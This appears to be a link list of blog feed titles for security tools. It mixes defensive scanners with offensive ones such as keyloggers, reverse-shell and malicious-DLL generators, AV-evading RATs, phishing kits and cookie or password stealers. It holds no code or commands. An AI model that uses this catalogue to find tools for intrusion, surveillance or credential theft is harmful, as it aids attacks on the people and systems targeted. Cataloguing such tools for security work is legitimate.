- [Cloudsplaining - An AWS IAM Security Assessment Tool That Identifies Violations Of Least Privilege And Generates A Risk-Prioritized Report](http://feedproxy.google.com/~r/PentestTools/~3/-7enjmYyTw8/cloudsplaining-aws-iam-security.html)
- [Kubei - A Flexible Kubernetes Runtime Scanner](http://feedproxy.google.com/~r/PentestTools/~3/7jhcROllIh4/kubei-flexible-kubernetes-runtime.html)
- [dazzleUP - A Tool That Detects The Privilege Escalation Vulnerabilities Caused By Misconfigurations And Missing Updates In The Windows OS](http://feedproxy.google.com/~r/PentestTools/~3/6MJqSmNP9VY/dazzleup-tool-that-detects-privilege.html)
- [uDork - Tool That Uses Advanced Google Search Techniques To Obtain Sensitive Information In Files Or Directories, Find IoT Devices, Detect Versions Of Web Applications, And So On](http://feedproxy.google.com/~r/PentestTools/~3/evrS1p3uO9k/udork-tool-that-uses-advanced-google.html)
- [Oralyzer - Tool To Identify Open Redirection](http://feedproxy.google.com/~r/PentestTools/~3/UpP-Msg0ZAU/oralyzer-tool-to-identify-open.html)
- [Kubebox - Terminal And Web Console For Kubernetes](http://feedproxy.google.com/~r/PentestTools/~3/jhL0O0WVKkw/kubebox-terminal-and-web-console-for.html)
- [Commit Stream - OSINT Tool For Finding Github Repositories By Extracting Commit Logs In Real Time From The Github Event API](http://feedproxy.google.com/~r/PentestTools/~3/hjAUze0ZEkI/commit-stream-osint-tool-for-finding.html)
- [Oralyzer - Open Redirection Analyzer](http://feedproxy.google.com/~r/PentestTools/~3/tedUK-Ukf8s/oralyzer-open-redirection-analyzer.html)
- [SNOWCRASH - A Polyglot Payload Generator](http://feedproxy.google.com/~r/PentestTools/~3/vaMcokVOhzg/snowcrash-polyglot-payload-generator.html)
- [Intelspy - Perform Automated Network Reconnaissance Scans](http://feedproxy.google.com/~r/PentestTools/~3/4HcknKGuMCo/intelspy-perform-automated-network.html)
- [HawkScan - Security Tool For Reconnaissance And Information Gathering On A Website](http://feedproxy.google.com/~r/PentestTools/~3/6OnYL4uwfKo/hawkscan-security-tool-for.html)
- [TrustJack - Yet Another PoC For Hijacking DLLs in Windows](http://feedproxy.google.com/~r/PentestTools/~3/DzvS1ceHIKQ/trustjack-yet-another-poc-for-hijacking.html)
- [HawkScan - Security Tool For Reconnaissance And Information Gathering On A Website. (Python 2.X &Amp; 3.X)](http://feedproxy.google.com/~r/PentestTools/~3/6OnYL4uwfKo/hawkscan-security-tool-for.html)
- [Sitedorks - Search Google/Bing/DuckDuckGo/Yandex/Yahoo For A Search Term With Different Websites](http://feedproxy.google.com/~r/PentestTools/~3/9zGBhKqPzSg/sitedorks-search-googlebingduckduckgoya.html)
- [reNgine - An Automated Reconnaissance Framework Meant For Gathering Information During Penetration Testing Of Web Applications](http://feedproxy.google.com/~r/PentestTools/~3/DqEKuwTfcIY/rengine-automated-reconnaissance.html)
- [Autoenum - Automatic Service Enumeration Script](http://feedproxy.google.com/~r/PentestTools/~3/ouPKC-dV2rk/autoenum-automatic-service-enumeration.html)
- [AuthMatrix - A Burp Suite Extension That Provides A Simple Way To Test Authorization](http://feedproxy.google.com/~r/PentestTools/~3/3qug9-U-7gg/authmatrix-burp-suite-extension-that.html)
- [Permission Manager - A Project That Brings Sanity To Kubernetes RBAC And Users Management, Web UI FTW](http://feedproxy.google.com/~r/PentestTools/~3/7QHE-VirROA/permission-manager-project-that-brings.html)
- [Quiver - Tool To Manage All Of Your Tools For Bug Bounty Hunting And Penetration Testing](http://feedproxy.google.com/~r/PentestTools/~3/Q-JC2NLFgqI/quiver-tool-to-manage-all-of-your-tools.html)
- [Onex - A Library Of Hacking Tools For Termux And Other Linux Distributions](http://feedproxy.google.com/~r/PentestTools/~3/C3LAwljExG4/onex-library-of-hacking-tools-for.html)
- [Kali-Linux-Tools-Interface - Graphical Web Interface Developed To Facilitate The Use Of Security Information Tools](http://feedproxy.google.com/~r/PentestTools/~3/6e2Xd2jTSi4/kali-linux-tools-interface-graphical.html)
- [Lazybee - Wordlist Generator Tool for Termux](http://feedproxy.google.com/~r/PentestTools/~3/mlKLXBNFceE/lazybee-wordlist-generator-tool-for.html)
- [NTLMRecon - A Tool To Enumerate Information From NTLM Authentication Enabled Web Endpoints](http://feedproxy.google.com/~r/PentestTools/~3/iInE04unlfs/ntlmrecon-tool-to-enumerate-information.html)
- [ADB-Toolkit - Tool for testing your Android device](http://feedproxy.google.com/~r/PentestTools/~3/9UFrHzThs_s/adb-toolkit-tool-for-testing-your.html)
- [hackerEnv - An Automation Tool That Quickly And Easily Sweep IPs And Scan Ports, Vulnerabilities And Exploit Them](http://feedproxy.google.com/~r/PentestTools/~3/kFzf2FsM6gM/hackerenv-automation-tool-that-quickly.html)
- [PENIOT - Penetration Testing Tool for IoT](http://feedproxy.google.com/~r/PentestTools/~3/zo7DgfaHfF4/peniot-penetration-testing-tool-for-iot.html)
- [Lazymux - A Huge List Of Many Hacking Tools And PEN-TESTING Tools](http://feedproxy.google.com/~r/PentestTools/~3/srTxRSMsGsY/lazymux-huge-list-of-many-hacking-tools.html)
- [Keylogger - Get Keyboard, Mouse, ScreenShot, Microphone Inputs From Target Computer And Send To Your Mail](http://feedproxy.google.com/~r/PentestTools/~3/IdBn4Nv7NV4/keylogger-get-keyboard-mouse-screenshot.html)
- [Bramble - A Hacking Open Source Suite](http://feedproxy.google.com/~r/PentestTools/~3/5xMqgrR4qRI/bramble-hacking-open-source-suite.html)
- [Docker for Pentest - Image With The More Used Tools To Create A Pentest Environment Easily And Quickly](http://feedproxy.google.com/~r/PentestTools/~3/DumidnUpHAk/docker-for-pentest-image-with-more-used.html)
- [T14M4T - Automated Brute-Forcing Attack Tool](http://feedproxy.google.com/~r/PentestTools/~3/hPB-qQXMc7c/t14m4t-automated-brute-forcing-attack.html)
- [Steganographer - Hide Files Or Data In Image Files](http://feedproxy.google.com/~r/PentestTools/~3/sVRV4AriMSU/steganographer-hide-files-or-data-in.html)
- [Tsunami - A General Purpose Network Security Scanner With An Extensible Plugin System For Detecting High Severity Vulnerabilities With High Confidence](http://feedproxy.google.com/~r/PentestTools/~3/30PPuSnvyvY/tsunami-general-purpose-network.html)
- [Saferwall - A Hackable Malware Sandbox For The 21St Century](http://feedproxy.google.com/~r/PentestTools/~3/wpJPhc5O1rc/saferwall-hackable-malware-sandbox-for.html)
- [WiFi Passview v4.0 - An Open Source Batch Script Based WiFi Passview For Windows!](http://feedproxy.google.com/~r/PentestTools/~3/KTPlLnQrLG4/wifi-passview-v40-open-source-batch.html)
- [Capsulecorp-Pentest - Vagrant VirtualBox Environment For Conducting An Internal Network Penetration Test](http://feedproxy.google.com/~r/PentestTools/~3/6FP53ToUZBI/capsulecorp-pentest-vagrant-virtualbox.html)
- [Natlas - Scaling Network Scanning](http://feedproxy.google.com/~r/PentestTools/~3/h8xZRsDegjQ/natlas-scaling-network-scanning.html)
- [Maskprocessor - High-Performance Word Generator With A Per-Position Configureable Charset](http://feedproxy.google.com/~r/PentestTools/~3/ghYiliC_heU/maskprocessor-high-performance-word.html)
- [X64Dbg - An Open-Source X64/X32 Debugger For Windows](http://feedproxy.google.com/~r/PentestTools/~3/pqD8YWT3164/x64dbg-open-source-x64x32-debugger-for.html)
- [DroneSploit - Drone Pentesting Framework Console](http://feedproxy.google.com/~r/PentestTools/~3/GTwrPeqJSaE/dronesploit-drone-pentesting-framework.html)
- [Padding-Oracle-Attacker - CLI Tool And Library To Execute Padding Oracle Attacks Easily](http://feedproxy.google.com/~r/PentestTools/~3/CjK2TwC9elM/padding-oracle-attacker-cli-tool-and.html)
- [Debotnet - A Tiny Portable Tool For Controlling Windows 10's Many Privacy-Related Settings And Keep Your Personal Data Private](http://feedproxy.google.com/~r/PentestTools/~3/qQU-wXw07Tg/debotnet-tiny-portable-tool-for.html)
- [Santa - A Binary Whitelisting/Blacklisting System For macOS](http://feedproxy.google.com/~r/PentestTools/~3/xeoFayAyG14/santa-binary-whitelistingblacklisting.html)
- [FinDOM-XSS - A Fast DOM Based XSS Vulnerability Scanner With Simplicity](http://feedproxy.google.com/~r/PentestTools/~3/crxe_ECer8M/findom-xss-fast-dom-based-xss.html)
- [ParamSpider - Mining Parameters From Dark Corners Of Web Archives](http://feedproxy.google.com/~r/PentestTools/~3/iOh8uMlwUvY/paramspider-mining-parameters-from-dark.html)
- [OWASP Threat Dragon - Cross-Platform Threat Modeling Application](http://feedproxy.google.com/~r/PentestTools/~3/apFjHPaqx1Y/owasp-threat-dragon-cross-platform.html)
- [GIVINGSTORM - Infection Vector That Bypasses AV, IDS, And IPS](http://feedproxy.google.com/~r/PentestTools/~3/-XlFTBIl8_Y/givingstorm-infection-vector-that.html)
- [Converting MBOX to Outlook Easily](http://feedproxy.google.com/~r/PentestTools/~3/zoX-hDUDFls/converting-mbox-to-outlook-easily.html)
- [WordListGen - Super Simple Python Word List Generator For Fuzzing And Brute Forcing In Python](http://feedproxy.google.com/~r/PentestTools/~3/2cBn6OpVMvo/wordlistgen-super-simple-python-word.html)
- [dorkScanner - A Typical Search Engine Dork Scanner Scrapes Search Engines With Dorks That You Provide In Order To Find Vulnerable URLs](http://feedproxy.google.com/~r/PentestTools/~3/5Y-zW-TzkAc/dorkscanner-typical-search-engine-dork.html)
- [Harbian-Audit - Hardened Debian GNU/Linux Distro Auditing](http://feedproxy.google.com/~r/PentestTools/~3/9AgN_ClJheI/harbian-audit-hardened-debian-gnulinux.html)
- [Shhgit - Find GitHub Secrets In Real Time](http://feedproxy.google.com/~r/PentestTools/~3/PHsUtb-C5vE/shhgit-find-github-secrets-in-real-time.html)
- [Scant3R - Web Security Scanner](http://feedproxy.google.com/~r/PentestTools/~3/hDy2IueTv-o/scant3r-scant3r-web-security-scanner.html)
- [Scant3R - ScanT3r - Web Security Scanner](http://feedproxy.google.com/~r/PentestTools/~3/hDy2IueTv-o/scant3r-scant3r-web-security-scanner.html)
- [Airshare - Cross-platform Content Sharing In A Local Network](http://feedproxy.google.com/~r/PentestTools/~3/rIOrri5vOIg/airshare-cross-platform-content-sharing.html)
- [Git All The Payloads! A Collection Of Web Attack Payloads](http://feedproxy.google.com/~r/PentestTools/~3/TSOPIs15EEg/git-all-payloads-collection-of-web.html)
- [Faxhell - A Bind Shell Using The Fax Service And A DLL Hijack](http://feedproxy.google.com/~r/PentestTools/~3/yWhg_kJIvFw/faxhell-bind-shell-using-fax-service.html)
- [Exe_To_Dll - Converts A EXE Into DLL](http://feedproxy.google.com/~r/PentestTools/~3/a0NB_1rFigw/exetodll-converts-exe-into-dll.html)
- [HackingTool - ALL IN ONE Hacking Tool For Hackers](http://feedproxy.google.com/~r/PentestTools/~3/KT90Pqvqdas/hackingtool-all-in-one-hacking-tool-for.html)
- [FastNetMon Community - Very Fast DDoS Analyzer With Sflow/Netflow/Mirror Support](http://feedproxy.google.com/~r/PentestTools/~3/YE8KhwOn8TQ/fastnetmon-community-very-fast-ddos.html)
- [GoGhost - High Performance, Lightweight, Portable Open Source Tool For Mass SMBGhost Scan](http://feedproxy.google.com/~r/PentestTools/~3/Y7VW4N8Oz5s/goghost-high-performance-lightweight.html)
- [How to Report IP Addresses](http://feedproxy.google.com/~r/PentestTools/~3/9OlqUlDTqCQ/how-to-report-ip-addresses.html)
- [Server Side Template Injection Payloads](http://feedproxy.google.com/~r/PentestTools/~3/r_UyLlqp7DY/server-side-template-injection-payloads.html)
- [Behave - A Monitoring Browser Extension For Pages Acting As Bad Boys](http://feedproxy.google.com/~r/PentestTools/~3/F4F6vUgcrTE/behave-monitoring-browser-extension-for.html)
- [ShellGen - Reverse shell generator](http://feedproxy.google.com/~r/PentestTools/~3/v6AEksEUHto/shellgen-reverse-shell-generator.html)
- [KITT-Lite - Python-Based Pentesting CLI Tool](http://feedproxy.google.com/~r/PentestTools/~3/uCMwFwjj-L4/kitt-lite-python-based-pentesting-cli.html)
- [How AI and Voice Technology is Similar to a Service Dog](http://feedproxy.google.com/~r/PentestTools/~3/fvWU1yho48c/how-ai-and-voice-technology-is-similar.html)
- [IIS-Raid - A Native Backdoor Module For Microsoft IIS (Internet Information Services)](http://feedproxy.google.com/~r/PentestTools/~3/2Rq9iTLImEY/iis-raid-native-backdoor-module-for.html)
- [UsoDllLoader - Windows - Weaponizing Privileged File Writes With The Update Session Orchestrator Service](http://feedproxy.google.com/~r/PentestTools/~3/avQzkwqCtoU/usodllloader-windows-weaponizing.html)
- [Basecrack - Best Decoder Tool For Base Encoding Schemes](http://feedproxy.google.com/~r/PentestTools/~3/aNj8sRhR4u0/basecrack-best-decoder-tool-for-base.html)
- [MSFPC - MSFvenom Payload Creator](http://feedproxy.google.com/~r/PentestTools/~3/t136V2RB-ZE/msfpc-msfvenom-payload-creator.html)
- [Kube-Bench - Checks Whether Kubernetes Is Deployed According To Security Best Practices As Defined In The CIS Kubernetes Benchmark](http://feedproxy.google.com/~r/PentestTools/~3/midjLJVoGvU/kube-bench-checks-whether-kubernetes-is.html)
- [EvilNet - Network Attack Wifi Attack Vlan Attack Arp Attack Mac Attack Attack Revealed Etc...](http://feedproxy.google.com/~r/PentestTools/~3/RH987lnPHpY/evilnet-network-attack-wifi-attack-vlan.html)
- [Xeexe - Undetectable And XOR Encrypting With Custom KEY (FUD Metasploit RAT)](http://feedproxy.google.com/~r/PentestTools/~3/NwcY_-uJ198/xeexe-undetectable-and-xor-encrypting.html)
- [BSF - Botnet Simulation Framework](http://feedproxy.google.com/~r/PentestTools/~3/11FU2_1TyCM/bsf-botnet-simulation-framework.html)
- [Espionage - A Network Packet And Traffic Interceptor For Linux. Spoof ARP & Wiretap A Network](http://feedproxy.google.com/~r/PentestTools/~3/5nHkLcaJGq8/espionage-network-packet-and-traffic.html)
- [Screenspy - Capture user screenshots using shortcut file (Bypass SmartScreen/Defender)](http://feedproxy.google.com/~r/PentestTools/~3/spZ-O7mhFCU/screenspy-capture-user-screenshots.html)
- [VBSmin - VBScript Minifier](http://feedproxy.google.com/~r/PentestTools/~3/wLnm1ZPcqNo/vbsmin-vbscript-minifier.html)
- [Cloudtopolis - Cracking Hashes In The Cloud For Free](http://feedproxy.google.com/~r/PentestTools/~3/b7ZjECS9gY8/cloudtopolis-cracking-hashes-in-cloud.html)
- [Spyse: All-In-One Cybersecurity Search Engine](http://feedproxy.google.com/~r/PentestTools/~3/YQZ594fHoX4/spyse-all-in-one-cybersecurity-search.html)
- [Colabcat - Running Hashcat On Google Colab With Session Backup And Restore](http://feedproxy.google.com/~r/PentestTools/~3/d9pPqRQqGW8/colabcat-running-hashcat-on-google.html)
- [CorsMe - Cross Origin Resource Sharing MisConfiguration Scanner](http://feedproxy.google.com/~r/PentestTools/~3/7IXHQJGvOKI/corsme-cross-origin-resource-sharing.html)
- [How to Free Recover Deleted Files on Your Mac](http://feedproxy.google.com/~r/PentestTools/~3/XuyM2gKdjX8/how-to-free-recover-deleted-files-on.html)
- [Sifter 7.4 - OSINT, Recon & Vulnerability Scanner](http://feedproxy.google.com/~r/PentestTools/~3/SHKZQt30BE0/sifter-74-osint-recon-vulnerability.html)
- [Hmmcookies - Grab Cookies From Firefox, Chrome, Opera Using A Shortcut File (Bypass UAC)](http://feedproxy.google.com/~r/PentestTools/~3/88yQ2bVk1_w/hmmcookies-grab-cookies-from-firefox.html)
- [Business Secure: How AI is Sneaking into our Restaurants](http://feedproxy.google.com/~r/PentestTools/~3/z5o9lKW7IPg/business-secure-how-ai-is-sneaking-into.html)
- [InQL - A Burp Extension For GraphQL Security Testing](http://feedproxy.google.com/~r/PentestTools/~3/jALwsux_18Y/inql-burp-extension-for-graphql.html)
- [TokenBreaker - JSON RSA To HMAC And None Algorithm Vulnerability POC](http://feedproxy.google.com/~r/PentestTools/~3/lHlCB6EzXjQ/tokenbreaker-json-rsa-to-hmac-and-none.html)
- [SAyHello - Capturing Audio (.Wav) From Target Using A Link](http://feedproxy.google.com/~r/PentestTools/~3/82UyTUbvNiU/sayhello-capturing-audio-wav-from.html)
- [Lynis 3.0.0 - Security Auditing Tool for Unix/Linux Systems](http://feedproxy.google.com/~r/PentestTools/~3/KFjjOJXfRNI/lynis-300-security-auditing-tool-for.html)
- [O.G. AUTO-RECON - Enumerate A Target Based Off Of Nmap Results](http://feedproxy.google.com/~r/PentestTools/~3/-hCMuXnT1LA/og-auto-recon-enumerate-target-based.html)
- [Zip Cracker - Python Script To Crack Zip Password With Dictionary Attack And Also Use Crunch As Pipeline](http://feedproxy.google.com/~r/PentestTools/~3/he_M48ychk0/zip-cracker-python-script-to-crack-zip.html)
- [DroidTracker - Script To Generate An Android App To Track Location In Real Time](http://feedproxy.google.com/~r/PentestTools/~3/5fV3zbDoT-I/droidtracker-script-to-generate-android.html)
- [Iox - Tool For Port Forward &Amp; Intranet Proxy](http://feedproxy.google.com/~r/PentestTools/~3/pt6JsZfXsj0/iox-tool-for-port-forward-intranet-proxy.html)
- [OSS-Fuzz - Continuous Fuzzing Of Open Source Software](http://feedproxy.google.com/~r/PentestTools/~3/qU-fQITHn08/oss-fuzz-continuous-fuzzing-of-open.html)
- [Vhosts-Sieve - Searching For Virtual Hosts Among Non-Resolvable Domains](http://feedproxy.google.com/~r/PentestTools/~3/25kS21dlRpk/vhosts-sieve-searching-for-virtual.html)
- [Formphish - Auto Phishing Form-Based Websites](http://feedproxy.google.com/~r/PentestTools/~3/KpG4QCw9F6s/formphish-auto-phishing-form-based.html)
- [SGN - Encoder Ported Into Go With Several Improvements](http://feedproxy.google.com/~r/PentestTools/~3/u-3dR_vCTk8/sgn-encoder-ported-into-go-with-several.html)
- [TeaBreak - A Productivity Burp Extension Which Reminds To Take Break While You Are At Work!](http://feedproxy.google.com/~r/PentestTools/~3/mm-2HUNg6vQ/teabreak-productivity-burp-extension.html)
- [Digital Signature Hijack - Binaries, PowerShell Scripts And Information About Digital Signature Hijacking](http://feedproxy.google.com/~r/PentestTools/~3/zaI4d7_isUg/digital-signature-hijack-binaries.html)
- [SecretFinder - A Python Script For Find Sensitive Data (Apikeys, Accesstoken, JWT...) And Search Anything On Javascript Files](http://feedproxy.google.com/~r/PentestTools/~3/EKoAtzjYUb8/secretfinder-python-script-for-find.html)
- [Fsociety - A Modular Penetration Testing Framework](http://feedproxy.google.com/~r/PentestTools/~3/na-4_fIQTq0/fsociety-modular-penetration-testing.html)
- [EvilDLL - Malicious DLL (Reverse Shell) Generator For DLL Hijacking](http://feedproxy.google.com/~r/PentestTools/~3/NuLQ_WXmQm4/evildll-malicious-dll-reverse-shell.html)
- [Axiom - A Dynamic Infrastructure Toolkit For Red Teamers And Bug Bounty Hunters!](http://feedproxy.google.com/~r/PentestTools/~3/kaPDeGDV9gg/axiom-dynamic-infrastructure-toolkit.html)
- [Fast-Google-Dorks-Scan - Fast Google Dorks Scan](http://feedproxy.google.com/~r/PentestTools/~3/wZgjNA3IKjw/fast-google-dorks-scan-fast-google.html)
- [URLCADIZ - A Simple Script To Generate A Hidden Url For Social Engineering](http://feedproxy.google.com/~r/PentestTools/~3/61lQnh22cpM/urlcadiz-simple-script-to-generate.html)
- [Shodanfy.py - Get Ports, Vulnerabilities, Informations, Banners, ..Etc For Any IP With Shodan (No Apikey! No Rate-Limit!)](http://feedproxy.google.com/~r/PentestTools/~3/LCnjNKIQMSs/shodanfypy-get-ports-vulnerabilities_13.html)
- [KatroLogger - KeyLogger For Linux Systems](http://feedproxy.google.com/~r/PentestTools/~3/NdSucxjr0k4/katrologger-keylogger-for-linux-systems.html)
- [Attacker-Group-Predictor - Tool To Predict Attacker Groups From The Techniques And Software Used](http://feedproxy.google.com/~r/PentestTools/~3/R3G4YpSDgiU/attacker-group-predictor-tool-to.html)
- [EvilPDF - Embedding Executable Files In PDF Documents](http://feedproxy.google.com/~r/PentestTools/~3/1bx5lbrEBCY/evilpdf-embedding-executable-files-in.html)
- [Needle - Instant Access To You Bug Bounty Submission Dashboard On Various Platforms + Publicly Disclosed Reports + #Bugbountytip](http://feedproxy.google.com/~r/PentestTools/~3/f0edTV__OZg/needle-instant-access-to-you-bug-bounty.html)
- [RMIScout - Wordlist And Bruteforce Strategies To Enumerate Java RMI Functions And Exploit RMI Parameter Unmarshalling Vulnerabilities](http://feedproxy.google.com/~r/PentestTools/~3/djPr0ddn3oo/rmiscout-wordlist-and-bruteforce.html)
- [Atlas - Quick SQLMap Tamper Suggester](http://feedproxy.google.com/~r/PentestTools/~3/bOxrvjP0QcY/atlas-quick-sqlmap-tamper-suggester.html)
- [Stegcloak - Hide Secrets With Invisible Characters In Plain Text Securely Using Passwords](http://feedproxy.google.com/~r/PentestTools/~3/wwD1qispYZ4/stegcloak-hide-secrets-with-invisible.html)
- [BabyShark - Basic C2 Server](http://feedproxy.google.com/~r/PentestTools/~3/6PhUfCftQpg/babyshark-basic-c2-server.html)
- [URLCrazy - Generate And Test Domain Typos And Variations To Detect And Perform Typo Squatting, URL Hijacking, Phishing, And Corporate Espionage](http://feedproxy.google.com/~r/PentestTools/~3/pCTRDE2dl1M/urlcrazy-generate-and-test-domain-typos.html)
- [Impost3r - A Linux Password Thief](http://feedproxy.google.com/~r/PentestTools/~3/wfqDp6nkSic/impost3r-linux-password-thief.html)
- [Tangalanga - The Zoom Conference Scanner Hacking Tool](http://feedproxy.google.com/~r/PentestTools/~3/TkUXwSH5HIU/tangalanga-zoom-conference-scanner.html)
- [Spyeye - Script To Generate Win32 .Exe File To Take Screenshots](http://feedproxy.google.com/~r/PentestTools/~3/kjq8wmtqsd8/spyeye-script-to-generate-win32-exe.html)
- [Words Scraper - Selenium Based Web Scraper To Generate Passwords List](http://feedproxy.google.com/~r/PentestTools/~3/KZxrwTrIDqE/words-scraper-selenium-based-web.html)
- [JSshell - A JavaScript Reverse Shell For Exploiting XSS Remotely Or Finding Blind XSS, Working With Both Unix And Windows OS](http://feedproxy.google.com/~r/PentestTools/~3/FAbak0SrepU/jsshell-javascript-reverse-shell-for.html)
- [Astsu - A Network Scanner Tool](http://feedproxy.google.com/~r/PentestTools/~3/UpyJkEUTzUA/astsu-network-scanner-tool.html)
- [Git-Scanner - A Tool For Bug Hunting Or Pentesting For Targeting Websites That Have Open .git Repositories Available In Public](http://feedproxy.google.com/~r/PentestTools/~3/gsKQWERd4E0/git-scanner-tool-for-bug-hunting-or.html)
- [Recox - Master Script For Web Reconnaissance](http://feedproxy.google.com/~r/PentestTools/~3/MrVXS9svia0/recox-master-script-for-web.html)
- [Jshole - A JavaScript Components Vulnrability Scanner, Based On RetireJS](http://feedproxy.google.com/~r/PentestTools/~3/hpITytQDgjw/jshole-javascript-components.html)
- [GitMonitor - A Github Scanning System To Look For Leaked Sensitive Information Based On Rules](http://feedproxy.google.com/~r/PentestTools/~3/icGYa6lk_F4/gitmonitor-github-scanning-system-to.html)
- [Eviloffice - Inject Macro And DDE Code Into Excel And Word Documents (Reverse Shell)](http://feedproxy.google.com/~r/PentestTools/~3/mWZy5zAqnCY/eviloffice-inject-macro-and-dde-code.html)
- [Ligolo - Reverse Tunneling Made Easy For Pentesters, By Pentesters](http://feedproxy.google.com/~r/PentestTools/~3/khATnePM3V8/ligolo-reverse-tunneling-made-easy-for.html)
- [Inshackle - Instagram Hacks: Track Unfollowers, Increase Your Followers, Download Stories, Etc](http://feedproxy.google.com/~r/PentestTools/~3/hUu-VErDuek/inshackle-instagram-hacks-track.html)
- [GhostShell - Malware Indetectable, With AV Bypass Techniques, Anti-Disassembly, And More](http://feedproxy.google.com/~r/PentestTools/~3/TVJ580qtwsg/ghostshell-malware-indetectable-with-av.html)
- [Forerunner - Fast And Extensible Network Scanning Library Featuring Multithreading, Ping Probing, And Scan Fetchers](http://feedproxy.google.com/~r/PentestTools/~3/v5uHd2kZOJE/forerunner-fast-and-extensible-network.html)
- [Enumy - Linux Post Exploitation Privilege Escalation Enumeration](http://feedproxy.google.com/~r/PentestTools/~3/IOJvTQFExEU/enumy-linux-post-exploitation-privilege.html)
- [Bing-Ip2Hosts - Bingip2Hosts Is A Bing.com Web Scraper That Discovers Websites By IP Address](http://feedproxy.google.com/~r/PentestTools/~3/8Po879yXQZ8/bing-ip2hosts-bingip2hosts-is-bingcom.html)
- [Vault - A Tool For Secrets Management, Encryption As A Service, And Privileged Access Management](http://feedproxy.google.com/~r/PentestTools/~3/PYNaKvSoc9s/vault-tool-for-secrets-management.html)
- [ADCollector - A Lightweight Tool To Quickly Extract Valuable Information From The Active Directory Environment For Both Attacking And Defending](http://feedproxy.google.com/~r/PentestTools/~3/9SedNJtUU74/adcollector-lightweight-tool-to-quickly.html)
- [ANDRAX v5R NH-Killer - Penetration Testing on Android](http://feedproxy.google.com/~r/PentestTools/~3/hIKv1ToZEMQ/andrax-v5r-nh-killer-penetration.html)
- [DroidFiles - Get Files From Android Directories](http://feedproxy.google.com/~r/PentestTools/~3/5OCoXRwNFdM/droidfiles-get-files-from-android.html)
- [Purify - All-in-one Tool For Managing Vulnerability Reports From AppSec Pipelines](http://feedproxy.google.com/~r/PentestTools/~3/nYUo-myE5M8/purify-all-in-one-tool-for-managing.html)
- [MemoryMapper - Lightweight Library Which Allows The Ability To Map Both Native And Managed Assemblies Into Memory](http://feedproxy.google.com/~r/PentestTools/~3/f8hlG8ETdCA/memorymapper-lightweight-library-which.html)
- [Project iKy v2.6.0 - Tool That Collects Information From An Email And Shows Results In A Nice Visual Interface](http://feedproxy.google.com/~r/PentestTools/~3/oiunjpsRvSc/project-iky-v260-tool-that-collects.html)
- [RepoPeek - A Python Script To Get Details About A Repository Without Cloning It](http://feedproxy.google.com/~r/PentestTools/~3/yoiCVdZZbCw/repopeek-python-script-to-get-details.html)
- [Pivotnacci - A Tool To Make Socks Connections Through HTTP Agents](http://feedproxy.google.com/~r/PentestTools/~3/yHERSP69CGA/pivotnacci-tool-to-make-socks.html)
- [OhMyQR - Hijack Services That Relies On QR Code Authentication](http://feedproxy.google.com/~r/PentestTools/~3/ZJqecIyqC_E/ohmyqr-hijack-services-that-relies-on.html)
- [FinalRecon - The Last Web Recon Tool You'll Need](http://feedproxy.google.com/~r/PentestTools/~3/01eMqUtKuTU/finalrecon-last-web-recon-tool-youll.html)
- [Jaeles v0.9 - The Swiss Army Knife For Automated Web Application Testing](http://feedproxy.google.com/~r/PentestTools/~3/vYnwGCa7How/jaeles-v09-swiss-army-knife-for.html)
- [Game-based learning platform provides full immersion into cybersecurity](http://feedproxy.google.com/~r/PentestTools/~3/K0-gmG9JMJM/game-based-learning-platform-provides.html)
- [AutoRDPwn v5.1 - The Shadow Attack Framework](http://feedproxy.google.com/~r/PentestTools/~3/KB6ZFOYRG30/autordpwn-v51-shadow-attack-framework.html)
- [EvilApp - Phishing Attack Using An Android App To Grab Session Cookies For Any Website (ByPass 2FA)](http://feedproxy.google.com/~r/PentestTools/~3/4q8G1KztMgY/evilapp-phishing-attack-using-android.html)
- [S3BucketList - Firefox Plugin The Lists Amazon S3 Buckets Found In Requests](http://feedproxy.google.com/~r/PentestTools/~3/RcIQULiPgSw/s3bucketlist-firefox-plugin-lists.html)
- [Locator - Geolocator, Ip Tracker, Device Info By URL (Serveo And Ngrok)](http://feedproxy.google.com/~r/PentestTools/~3/Y1QTUkss38U/locator-geolocator-ip-tracker-device.html)
- [Guardedbox - Online Client-Side Manager For Secure Storage And Secrets Sharing](http://feedproxy.google.com/~r/PentestTools/~3/6HfBPqV4dkE/guardedbox-online-client-side-manager.html)
- [Faraday v3.11 - Collaborative Penetration Test and Vulnerability Management Platform](http://feedproxy.google.com/~r/PentestTools/~3/AYy0Ih0d-z0/faraday-v311-collaborative-penetration.html)
- [Minimalistic-offensive-security-tools - A Repository Of Tools For Pentesting Of Restricted And Isolated Environments](http://feedproxy.google.com/~r/PentestTools/~3/dc_wqDPZa74/minimalistic-offensive-security-tools.html)
- [Carina - Webshell, Virtual Private Server (VPS) And cPanel Database](http://feedproxy.google.com/~r/PentestTools/~3/XTsZSdEvD1s/carina-webshell-virtual-private-server.html)
- [Nishang - Offensive PowerShell For Red Team, Penetration Testing And Offensive Security](http://feedproxy.google.com/~r/PentestTools/~3/dbQKR-HMitE/nishang-offensive-powershell-for-red.html)
- [Web Hacker's Weapons - A Collection Of Cool Tools Used By Web Hackers](http://feedproxy.google.com/~r/PentestTools/~3/gtBsb59j5_g/web-hackers-weapons-collection-of-cool.html)
- [Spray - A Password Spraying Tool For Active Directory Credentials By Jacob Wilkin(Greenwolf)](http://feedproxy.google.com/~r/PentestTools/~3/98z31AaFB7k/spray-password-spraying-tool-for-active.html)
- [Self-XSS - Self-XSS Attack Using Bit.Ly To Grab Cookies Tricking Users Into Running Malicious Code](http://feedproxy.google.com/~r/PentestTools/~3/b-yEqKBcYXo/self-xss-self-xss-attack-using-bitly-to.html)
- [Open Sesame - A Tool Which Runs To Display Random Publicly Disclosed Hackerone Reports When Bored](http://feedproxy.google.com/~r/PentestTools/~3/W74U39At1Po/open-sesame-tool-which-runs-to-display.html)
- [BlackDir-Framework - Web Application Vulnerability Scanner](http://feedproxy.google.com/~r/PentestTools/~3/KdhQYNLLv0w/blackdir-framework-web-application.html)
- [Sharingan - Offensive Security Recon Tool](http://feedproxy.google.com/~r/PentestTools/~3/XMliUAHtHBE/sharingan-offensive-security-recon-tool.html)
- [BADlnk - Reverse Shell In Shortcut File (.lnk)](http://feedproxy.google.com/~r/PentestTools/~3/PTLwZDrbwK4/badlnk-reverse-shell-in-shortcut-file.html)
- [ParamKit - A Small Library Helping To Parse Commandline Parameters](http://feedproxy.google.com/~r/PentestTools/~3/nfXwCLYC4dI/paramkit-small-library-helping-to-parse.html)
- [Hidden-Cry - Windows Crypter/Decrypter Generator With AES 256 Bits Key](http://feedproxy.google.com/~r/PentestTools/~3/Bvf7CnAZqNI/hidden-cry-windows-crypterdecrypter.html)
